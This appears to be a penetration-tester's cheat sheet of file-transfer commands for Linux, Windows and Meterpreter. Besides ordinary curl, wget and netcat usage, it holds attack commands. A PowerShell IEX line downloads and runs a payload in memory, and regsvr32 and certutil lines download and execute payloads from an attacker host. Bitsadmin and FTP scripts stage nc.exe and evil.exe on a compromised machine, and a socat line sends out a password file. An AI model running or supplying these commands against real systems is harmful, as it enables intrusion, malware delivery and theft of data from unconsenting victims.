HOST SIMPLE HTTP SERVER
python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000
===================
NETCAT
===================
On Receiving End
nc -l -p 1234 > out.file
On Sending End
nc -w 3 [destination] 1234 < out.file
OR
On Receving End
nc -l -p 1234 | uncompress -c | tar xvfp -
On Sending End
tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
===================
SOCAT
===================
On Server Sending File Do
socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
On Client Receiving File Do
socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat
OR
On Server Receving File Do
socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
On Client Sending File Do
socat -u FILE:test.txt TCP:127.0.0.1:9876
OR
# File Transfer
socat TCP4-LISTEN:443,fork file:secret_password.txt # This sets up sending a file
socat TCP4:<ip>:<port> file:received_secret_password.txt,create
=======================
PYTHON3
=======================
URLLIB REQUEST MODULE
import urllib.request
print('Beginning file download with urllib2...')
url = '<url>/<uriToFile>'
urllib.request.urlretrieve(url, '/Users/tobor/Downloads/<filename.txt>')
OR
URLLIB2 MODULE
import urllib2
filedata = urllib2.urlopen('<url>/<uriToFile>')
datatowrite = filedata.read()
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
f.write(datatowrite)
OR
REQUESTS MODULE
import requests
print('Beginning file download with requests')
url = '<url>/<uriToFile>'
r = requests.get(url)
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
f.write(r.content)
# Retrieve HTTP meta-data
print(r.status_code)
print(r.headers['content-type'])
print(r.encoding)
OR
WGET MODULE
import wget
print('Beginning file download with wget module')
url = '<url>/<uriToFile>'
wget.download(url, '/Users/tobor/Downloads/file.txt')
====================
WINDOWS
====================
PowerCat:
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
powercat -l -p 8000 -of C:\inputfile
Download Powershell Script and Execute Without Touching Disk:
IEX(New-Object Net.WebClient).downloadString('<url>/<payload>') ;<methodName>
Download To File:
Invoke-WebRequest "http://<ip>:<port>/<in file>" -OutFile "<out file>"
Download File With PowerShell
Start-BitsTransfer http://<attackerip>:<port>/<payload> -Destinations C:\Path\To\Save\File.ps1
Download File With Command Prompt
certutil.exe -urlcache -split -f http://<attackMachineIP>:<port>/Payload.exe C:\Path\To\Save\File
Download File With BitsAdmin
bitsadmin /transfer debjob /download /priority normal <url> <pathToSaveTo>
OR
bitsadmin /create /download <JobName>
bitsadmin /addFile <JobName> http://<attackerip>:<port>/payload.exe C:\Path\To\Download\To.txt
bitsadmin /setproxysettings <JobName> OVERRIDE proxy1:80 "<local>"
bitsadmin /resume <JobName>
bitsadmin /monitor
bitsadmin /complete <JobName>
Download and Execute File Using RegSVR
regsvr32 /s /n /u /i:<url>:<port>/<payload> scrobj.dll
#----------------------------------------------
# Start FTP server on attack machine
systemctl start ftp
cp nc.exe /ftphome/nc.exe
# Create txt file of ftp commands to download file
echo "open <ftp server ip address>" >> ftp.txt
echo "USER <username>" >> ftp.txt
echo "<password>" >> ftp.txt
echo "bin" >> ftp.txt
echo "GET nc.exe" >> ftp.txt
echo "bye" >> ftp.txt
# In shell on Windows perform non-interactive download of netcat
ftp -v -n -s:ftp.txt
#======================================
# CREATE WGET.EXE on WINDOWS
#======================================
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
#======================================
# CREATE WGET.PS1 & DOWNLOAD IT ON WINDOWS
#======================================
echo $webClient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://<attack_ip>/wget.exe" >> wget.ps1
echo $file = "evil.exe" >> wget.ps1
echo $webClient.DownloadFile($url,$file) >> wget.ps1
====================
LINUX
====================
WGET
wget -O <Preferred_FileName> <url>
CURL
Curl To Download File
curl -o output.file <url>/<uritoFile>
curl -O <uritoFile>
curl --remote-name <url>/<uritoFile>
curl -u Username:Password <url>/<uritoFile>
Curl to Download Multiple Files
curl -O <url>/<uritoFile> -O <url>/<uritoFile>
Curl To Download Web Page
curl -o nixcraft.html <url>/<uritoFile>
Curl to Download From SSH Server
curl -u username sftp://server1.cyberciti.biz/path/to/file.txt
OR
curl -u username: --key ~/.ssh/id_rsa --pubkey ~/.ssh/id_rsa.pub
Curl to Download From FTP Server
curl ftp://username:passwordd@<domain.com>:21/path/to/backup.tar.gz
METERPRETER
download -f <pathToFile> <SaveFileLocation>